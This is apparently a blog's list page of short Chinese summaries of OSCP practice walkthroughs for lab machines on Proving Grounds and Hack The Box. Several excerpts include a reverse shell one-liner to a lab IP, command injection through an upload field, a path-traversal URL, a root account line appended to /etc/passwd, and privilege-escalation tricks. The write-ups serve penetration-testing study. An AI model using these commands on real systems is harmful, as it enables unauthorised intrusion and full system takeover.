- 博客(82)
- 收藏
- 关注
RSS订阅原创 OSCP - Proving Grounds - Catto
看起来是访问server的密码,也许是ssh,不过 我们没有用户名, “MC server”字样出现了,因为在home page里有一个 Minecraft - The Island页面 有一组人名,也许是潜在的用户名。由于所有者是root,盲猜是root的密码,不过看起来是base64 编码的,不过直接用base64解密会失败的,不过在linpeas.sh的结果中发现了一个/usr/bin/base64key。从结果中发现了比较有用的信息,303330端口比较有价值。从网页上寻找额外信息。
2025-09-07 23:18:40
357
原创 OSCP - Proving Grounds - Shenzi
基本的意思是,如果两个注册表项的 AlwaysInstallElevated 是激活的状态,就会允许任意用户以Administrator的身份执行msi文件,虽然文章里是 利用msfvenom生成创建用户的msi,我们可以通过生成 创建reverse shell的msi来获得Administrator权限。尝试了各种字典都有任何有价值的线索,查了一下别人的walkthrough才知道有一个shenzi路径,这个路径在常用的字典里 是没有的,看起来 当你实在爆破不出东西的时候,试试靶机的名字吧。
2025-08-20 15:18:20
484
原创 OSCP - Proving Grounds - Vanity
source目录下有一个upload.php文件,其中的代码如下,看起来会对上传的文件校验后缀,如果在deny list中,就会阻止上传,反之,则会运行/usr/bin/clamscan 命令,参数是name变量,于是我们可以尝试一下在name中拼接linux命令。利用burpsuite尝试了一下,最后使用了base64 编码的方式创建了reverse shell,其中base64编码的部分为: bash -i >& /dev/tcp/192.168.45.225/80 0>&1。继而进行rsync同步。
2025-08-18 22:44:42
409
原创 OSCP - Proving Grounds - CVE-2024-25180
反弹shell就会被创建,这里其实有别的方法,不用这么麻烦,一条命令 rm /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc192.168.45.225 80>/tmp/f 也可以。其中1234端口开放了一个pdfmake,虽然不知道具体的版本,不过google一下 发现CVE-2024-25180排名比较靠前,于是尝试一下。将PoC中的CMD替换成下面的命令依次执行。nmap开始两个端口开放,22和1234。
2025-08-15 20:52:08
263
原创 OSCP - Proving Grounds - Fish
把payload 下载后放到 ~/.msf4/modules/exploits/local/路径下后 在msf console中执行reload_all后。稍微使用了一下 metasploit它在OSCP考试中是基本禁用的,不过OSEP中就没有该限制了,就当学习了。而后在remote 端的浏览器中,访问 如下地址便可创建来自system用户的reverse shell。输入run命令后,便可以得到AppConfig.xml文件,其中包含一组用户名和密码。这里按照下面的截图设置参数。
2025-08-12 08:25:58
374
原创 OSCP - Proving Grounds - Crane
更改路径则可以遍历/home/remi下的文件,其中keys中包含很多密钥,root/id_rsa,(即使下载下来也没办直接使用key登录),不过我们可以生成一个key pair,并在.ssh路径下面上传一个authorized_keys文件来实现ssh登录。先打开burpsuite在登录页面注册一个用户tim1,发现会有如下请求和响应,看起来如果confirmed=false,就会一直无法登录成功,不过直接拦截response更改成true是不好用的。来达到LFI的功能,并且也发现了remi用户。
2025-08-04 09:36:57
344
原创 OSCP - Proving Grounds - SPX
SPX_KEY=a2a90ca2f9f0ea04d267b16fb8e63800&SPX_UI_URI=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fwww%2fhtml%2findex.php来下载index.php。另外,home路径下存在一个profiler用户,尝试了一下,没有密码,所以只能用手里有的profile和lowprofiler密码来尝试,居然成功了。
2025-07-31 10:02:54
718
原创 OSCP - Proving Grounds - DVR4
这里可以使用windows 的runas的命令 来运行 c:\users\viewer\nc.exe来创建 Administrator用户的反弹shell,runas的使用可以参考。目前我们不知道具体的remote server用户名都是什么,但是可以尝试一下这两个,至少Administrator是一个合法的用户名。经过尝试,我们可以用如下命令,来得到viewer用户的key文件,可以成功ssh登录。而本地则会收到Administrator用户的reverse shell,提权成功。
2025-07-27 11:40:29
309
原创 OSCP - HTB - Cicada
我们优先利用smbclient 来尝试攻击一下smb/netbios服务,发现 挂载了smb路径且无需密码,其中HR路径下可以访问,并存在一个包含密码 Cicada$M6Corpb*@Lp#nZp!在下载好sam与system文件后,在本地使用pypykatz将他们合并,并可以发现 Administrator用户的密码的Hash值为2b87e7c93a3e8a0ea4a581937016f341。接下来使用enum4linux-ng与刚发现的用户名密码来发现更多的信息,发现了又一组用户名密码。
2025-07-07 15:49:09
357
原创 OSCP - Proving Grounds - DC - 1
下面我们用这个exp来创建反弹shell(一定要先在本地启动nc 命令监听),reverse shell成功创建后发现find命令具有SUID权限。我们这里稍微改一下 ,改为 ./find . -exec /bin/bash -p \;-quit,就会成功提权。不过目前不知道具体的小版本信息,不过我们可以广泛搜索并尝试一下可能的exp ,比如。nmap起手,80端口比较有意思,安装了 Drupal 7。按照GTFObins的描述来实现是会失败的。下载并执行,成功,果然是这个exp。
2025-07-03 18:42:21
307
原创 OSCP - Proving Grounds - tre
访问一下,是一个mysql 的web UI,用发现的mantissuser/password@123AS来登录,成功,其中mantis_user_table中的tre行对应的realname好像是一个密码,而恰好remote server有一个tre的用户。上传并执行linpeas.sh,发现一个有趣的文件 /var/www/html/mantisbt/config/config_inc.php,其中包括数据库的用户名和密码,但是无法从命令行登录。尝试su tre,成功,并且发现了该用户可以重启服务器。
2025-07-01 10:08:49
289
原创 OSCP - Proving Grounds - Inclusiveness
也发现了有一个rootshell命令具有SUID权限,比较可疑,它是会调用whoami命令,再对比是否是tom用户在执行,如果是则赋予SUID,否则退出,由于没有指定whoami的具体路径,所以我们可以考虑更改path的方式来让whoami命令指向我们自定义的whoami命令,也就是脚本劫持来达到提权的目的。发现一个隐藏路径,访问一下,发现url中的lang=en.php比较可疑,修改一下可以触发本地文件包含漏洞,可以读取ftp的配置文件从而得知ftp共享文件的路径。
2025-06-26 20:55:22
299
原创 OSCP - Proving Grounds - DC-2
利用result.txt当做wordlist来爆破ssh,和wordpress,(虽然jerry的用户的密码就是wpscan爆破出来的adipiscing,但是是无法直接用ssh登录的)使用tom/parturient来ssh登录,成功,不过得到的是一个rbash,非常受限,且无法修改PATH的值。而80端口其实是一个wordpress,并且需要把 dc-2和ip地址绑定,添加到/etc/hosts文件中。尝试一下wpscan爆破出的jerry的密码 adipiscing,尝试转变成jerry用户,成功。
2025-06-16 15:43:55
293
原创 OSCP - Hack The Box - Sau
简单研究了一下,这个CVE是 允许通过request-baskets来把请求转发到某处,这里考虑把请求转发到服务端的80端口(这里的127.0.01实际上会出现在requests-basket entry的配置里,也就是会指向服务器自身)执行sudo -l会发现线索 /usr/bin/systemctl。下载后执行如下命令,则会创建reverse shell。后会得到Maltrail v0.53的页面。打开页面后,在左下角找到了软件信息和版本。搜索相关信息会得到很多exp,这里使用了。
2025-05-12 16:37:43
391
原创 OSCP - Proving Grounds - EvilBox-One
robots.txt中的内容是`Hello H4x0r`,没有发现有什么用处,线索也不太多,所以强行爆破/secret/路径寻找php文件,发现了evil.php。通过先后包含 /etc/passwd和/home/mowree/.ssh/id_rsa文件获取到key文件用于登录,这里需要注意,如果是在浏览器中打开。登录后尝试了SUID,sudo -l都没有什么信息,但是在上传了linpeas.sh并运行后发现了 /etc/passwd对于所有用户都有读写权限。
2025-05-10 19:38:26
516
原创 OSCP - Proving Grounds - Pwned1
其中 /robots.txt就是包含了其他两个路径,并且其中/hidden_text比较有用,里面包含了一个名为secret.dic的字典文件,咱们可以利用它来爆破一下路径,并发现了一个路径。利用这一组用户名密码可以成功登录ftp服务,并且可以下载一个id_rsa的key文件,和一个note.txt文件,其中包含了一个人名。依旧先Nmap收集一下信息,21,22,80端口开放,尝试了一下ftp匿名登录,失败,于是专注于80端口。看起来是个登录页面,尝试了一下弱密码,无果,查看了一下源码发现了一些代码。
2025-05-09 15:22:32
251
原创 OSCP - Proving Grounds - Sumo
于是我们执行一下nikto,发现了应该是由shellshock漏洞,于是搜索一下。执行nmap扫描,比较直观,22和80端口开放,但是80端口没有什么内容。反弹shell会被创建,在当前目录下也可以直接获取到第一个flag。上传Linpeas.sh后并执行,发现了有dirtycow漏洞,在本地启动了nc -nlvp 80后 执行exp脚本。在本地编译后并上传运行后成功得到root权限。在尝试了几个exp之后, 找到了一个好用的。找一个比较靠谱的,我选择了dirty.c。
2025-05-07 21:29:50
238
原创 OSCP - Proving Grounds - NoName
稍微尝试了一下,发现可能有一些保护或者限制,所以我们采用另一种办法,利用base64编码/解码的方式绕过(ncat是我下载的一个已经编译好的文件,便于在nc没有安装的情况下创建reverse shell)经过试验,haclabs.jpeg包含隐写过的内容,密码是harder,而内容是经过base64编码的superadmin.php,所以我们尝试访问一下。查看一下页面源码,在底端发现了一个passphrase,也许是隐写过的图片的密码,于是我们把图片都下载下来。发现了admin目录。打开就发现了很多图片。
2025-05-06 23:45:09
420
原创 OSCP - Proving Grounds - Wpwn
便可获得reverse shell,也可以在/var/www路径下获取到第一个flag。发现了robots.txt和wordpress路径,但是robots.txt毫无价值。执行wpsan,在结果中发现了有漏洞的插件social-warfare。本地启动server和nc -nlvp 443后,访问。发现了一个比较有用的数据库配置文件,其中包含一个密码。在本地目录下创建payload.txt,内容为。经过尝试,我们可以得知改密码属于takis用户。并且该用户可以无需密码执行sudo。比较直接,22和80。
2025-04-28 08:55:43
393
原创 OSCP - Proving Grounds - Gaara
ssh登录remote server后,查找一下SUID权限的文件,发现了 gdb和gimp-2.10,参考GTFObins的提示,顺利提权,(不过gimp-2.10我这里报错了 :Cannot open display)但是无论执行路径爆破或者nikto 都没有任何有价值的收获,只能把注意力放在ssh爆破上了,这里有个很显著的用户名 gaara。nmap来查看一下开放哪些端口和服务,比较直接,只有22和80。使用hydra爆破一下,成功得到了密码iloveyou2。
2025-04-26 09:24:37
224
原创 OSCP - Proving Grounds - My-CMSMS
现在把目光转移到3306端口,尝试了一下弱密码,root/root 成功登录,既然是root用户,我们就可以重置CMS用户的密码,这里参考了官方文档,修改密码后登录成功。这里我们修改kali自带的 php reverse shell文件,更改ip/端口后 后缀改为phtml,上传, 在新窗口打开该文件后,反弹shell创建成功。其中80端口安装了一个CMS系统,左下角显示版本信息,查询了一下,有文件上传+RCE漏洞,不过需要用户名密码。
2025-04-23 06:35:51
388
原创 OSCP - Proving Grounds - Sar
但是,貌似80端口没有安装任何服务,是一个apche2的默认页面,不过我们这里dirb一下,发现了robots.txt,而robots.txt里包含了一个sar2HTML的路径。下载后执行,得到一个远程代码执行的console,但是还是不够,这里根据以往的经验,直接上传一个编译好的ncat,会快很多, 也可以尝试别的方法创建反弹shell。上传linpeas.sh并运行,则会发现,/var/www/html/finally.sh会每5分钟被sudo执行一次。所以我们可以直接劫持write.sh来提权。
2025-04-20 15:34:33
264
原创 OSCP - Proving Grounds - DriftingBlues6
后可以尝试多看一看,发现可以文件上传,在我们上传了一个文件之后,可以在刚才是空的 ../textpattern/files目录下看到,这时我们试一下上传一个 php reverse shell 并访问192.168.192.219/textpattern/files/php-reverse-shell.php 后,发现可以创建反弹shell。robots.txt里给出了一些信息 /textpattern/textpattern应该有东西,而.zip后缀可以重点关注。这里我先后尝试,也是我经常用的几个。
2025-04-17 07:40:36
470
原创 OSCP - Proving Grounds -FunboxEasy
这里随意选了一本书作为实验对象,尝试上传修改过的php reverse shell文件,没有报错,如果发现sql语句报错的情况,可以直接把 Author Title Publisher都改成Test,避免特殊字符过滤的问题。我首先试验的是admin,有sql注入漏洞,但是admin身份登录进去以后我没发现太多有价值的线索,之后把注意力转移到了store页面,利用了弱密码admin/admin登录成功。首先是nmap扫描一下,虽然只有22,80和3306端口,但是事情没那么简单。
2025-04-14 17:28:26
284
原创 OSCP - HTB - BoardLight
在linpeas.sh的结果中发现了更多的关于enlightenment的信息,存在CVE-2022-37706漏洞,exp为。搜索Dolibarr 17.0.0相关的信息,发现了 默认密码为admin/admin,而RCE 的poc为。UDP端口是filter掉的,而TCP端口也只是22,和80,比较直观。在80端口开放的页面最下方发现了一个host, board.htb。这时先搜索一下80端口的目录,在conf.php中发现了一个密码。这时查看一下home目录,发现了larissa用户。
2025-04-06 14:30:21
353
原创 OSCP - Proving Grounds- SoSimple
继续以steven的用户身份进行sudo -l,发现可以以root用户身份执行/opt/tools/server-health.sh。但其实并无该文件,所以我们尝试创建一个,其内容为赋予/bin/bash SUID,再以Root身份执行,提权成功。按照同样的套路,我们发现了/home/max目录中的.ssh路径下有key文件,所以复制下来尝试ssh登录。于是我们使用wpscan进行扫描,我这边挂了代理,并且我希望使用更有侵略性的插件扫描,所以命令如下。
2025-04-05 13:19:58
423
原创 OSCP - Proving Grounds - Zipper
按照这个尝试,打开burpsuite,访问如下内容,其中cmd是rm /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.226 80>/tmp/f的URL编码后的结果。这台机器还是很有难度的,我也是借鉴了一些别人的walkthrough才打下来,毕竟我对php实在没有研究,万没想到这东西还能LFI,学到了。既然是cron job,那么我们可以使用pspy64来看一下,有两个输出,第一个是*****,第二行则是明文密码。
2025-03-27 07:53:42
822
原创 OSCP - Proving Grounds- XposedAPI
于是复制remote server上的 /etc/passwd文件,在本地利用 openssl passwd -1 -salt 'tim' '1234' 生成密码后在passwd文件中追加一条记录tim:$1$tim$flzK.XIfIc3zTStgJZBye1:0:0:root:/root:/bin/bash。,可以实现LFI的目的,同时也发现了用户clumsyadmin,也许可以用在update api里。访问并试验一下,这些API应该都可以访问,有的成功有的报错,需要继续调查。
2025-03-23 07:37:50
276
原创 OSCP - Proving Grounds- CVE-2023-46818
于是先上传一个编译好的ncat,赋予执行权限后,本地启动nc -nlvp 80,而在remote 端的reverse shell中执行如下命令,新的reverse shell创建成功。同时查看相关的vulnerability,首先发现下面的exp,不过好像不是很好用,但给出了一个线索 ,该exp关联的就是CVE-2023-46818,和machine的名字一样。这个是好用的,可以得到reverse shell,不过这个限制比较多,咱们需要一个更好的reverse shell。
2025-03-19 15:22:40
365
原创 OSCP - HTB - Lame
执行find / -type f -perm -4000 2>/dev/null.发现了nmap具有SUID。nmap开路,经过查看ftp,和smb client都没有任何收获,只好把注意力放在3632上了。虽然文章给了poc,不过貌似不太好用,继续搜索 CVE-2004-2687相关poc,执行后得到reverse shell。按照描述,可以查询到确实有漏洞。
2025-03-16 10:13:22
227
原创 OSCP - Proving Grounds - Election
在../electin/admin/logs里发现了疑似用户名密码,不过用来登录UI是不行的,实际上是ssh的用户名和密码,虽然看来好像是WebUI的用户名密码。上传并执行Linpeas.sh,发现了内核漏洞,其他的并没有太多有价值的信息,这个漏洞并不是很常见,所以虽然它是less probable,但是也值得尝试一下。对于80端口进行枚举,发现了 ../election路径,进而发现了 ../election/admin ,../election/admin/logs路径。
2025-03-06 09:20:26
256
原创 OSCP - Proving Grounds - Fired
确实可以成功,但是尝试了各种reverse shell的方法,都不行,于是尝试找到一个ncat的portable版本。, 上传到remote server后成功创建reverse shell(记得chmod +x /tmp/ncat)这里比价抓狂,linpeas.sh和pspy64都毫无有价值线索,但是在Linpeas.sh的结果中发现了不起眼的。虽然不太喜欢这种手动挨个文件找的行为,不过在这个路径下找到了一个密码,尝试一下root用户吧,万一成功尼。尝试寻找各种信息,发现了3个有价值的文章。
2025-03-03 10:48:22
336
原创 OSCP - Proving Grounds - dev_working
执行一下backup,发现需要密码,所以先观察一下backup的代码,得到密码: B4cup32M4n4age,并且知道了backup在执行的时候会调用 ./lib_backup.so,所以思路就比较清晰了,劫持lib_back.so来提权。我虽然没能成功爆破,不过在google上发现了一个字典文件,里面有bob对应的密码hash,得到了bob的密码sunflower,可以成功登录ssh。nmap扫描,22,3306,8983端口开放,应该运行了ssh,mysql和未知应用。运行backup,提权成功。
2025-02-21 09:11:50
382
原创 OSCP - Proving Grounds - LaVita
修改php-reverse-shell.php的ip和端口并上传到remote端,重命名并覆盖/var/www/html/lavita/artisan,本地执行nc -nlvp 3306,等一会儿得到了第二个reverse shell。修改一下变成如下,如果第一个命令用skunk的反弹shell无法执行,可以考虑用www-data用户的反弹shell执行,并用skunk的反弹shell执行第二个命令。运行后发现该脚本比较全面,会尝试不同的RCE漏洞的exploit,有成功的,有失败的。
2025-02-19 14:55:46
1947
原创 OSCP - Proving Grounds - Squid
访问UI界面,发现是系统用户,提权都不用了,其实这里可以直接用dir和type命令搭配直接拿到Local.txt和proof.txt的,不过我们还是尝试创建reverse shell。而phpmyadmin则是mysql/mariadb的web UI,尝试各种弱密码后,发现可以用root用户免密码登录mysql数据库,这是我没想到的。尝试在remote端寻找nc.exe或者ncat.exe,都没有安装,所以在本地启动Python服务器后,上传kali中的nc.exe到remote端。
2025-02-15 13:43:44
448
原创 OSCP - Other Machines - Loly
重新调用wpscan,加入字典进行密码爆破,成功,一个密码文件不行就多换几个试试,尽量不要用rockyou,太大了,山穷水尽的时候再考虑rockyou。我们尝试一下新建一个reverse文件夹并将php-reverse-shell.php复制并修改,最后打包成一个reverse.zip后上传,上传成功。用sudo -l和suid作为线索去试验,没有发现任何东西,但是在linpeas的结果中发现了,linux版本应该有漏洞,查询一下发现了。在settigns中发现了上传后文件的保存路径。
2025-02-10 22:32:33
682
原创 OSCP - Proving Grounds - DC-9
目前其实我们是卡住了,因为22端口是关闭的,不过我们可以尝试继续爆破remote server的系统文件, 至于为什么是response words是55, 因为如果没有任何文件被包含,response的words数量就是55,这样可以过滤掉很多数据,而字典文件比较重要,需要使用/usr/share/SecLists/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt。我们首先把这些数据保存成文件,名字为users用冒号分割,一会儿爆破用。
2025-02-06 09:52:14
1103
原创 OSCP - Proving Grounds - sar2HTML
这个finally.sh比较可疑,查看一下,看起来这个finally.sh会调用write.sh,而我们对于write.sh有写权限。枚举一下路径,发现有phpinfo和robots.txt,而robots.txt里有sar2HTML路径。sudo -l和suid都没有什么有用的信息,上传Linpeas.sh并执行,得到。尝试访问一下sar2HTML,得知是3.2.1版本,搜索一下得知其有RCE漏洞。修改write.sh,让其赋予/bin/bash SUID。nmap扫描,只开了一个80端口。
2025-02-05 10:44:06
504
原创 OSCP -Proving Grounds - Blogger
在pspy64的结果中发现了 /usr/local/bin/backup.sh被root用户以cronjob的形式运行,并且它会利用tar命令备份/home/james/路径下的 local.txt,不过目前我们没有james的密码。利用得到的密码来转变成james来在/home/james路径下创建文件来实现提权,思路是利用创建checkpoint文件 来让tar命令执行的时候调用相关script。
2025-02-05 10:40:27
584
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人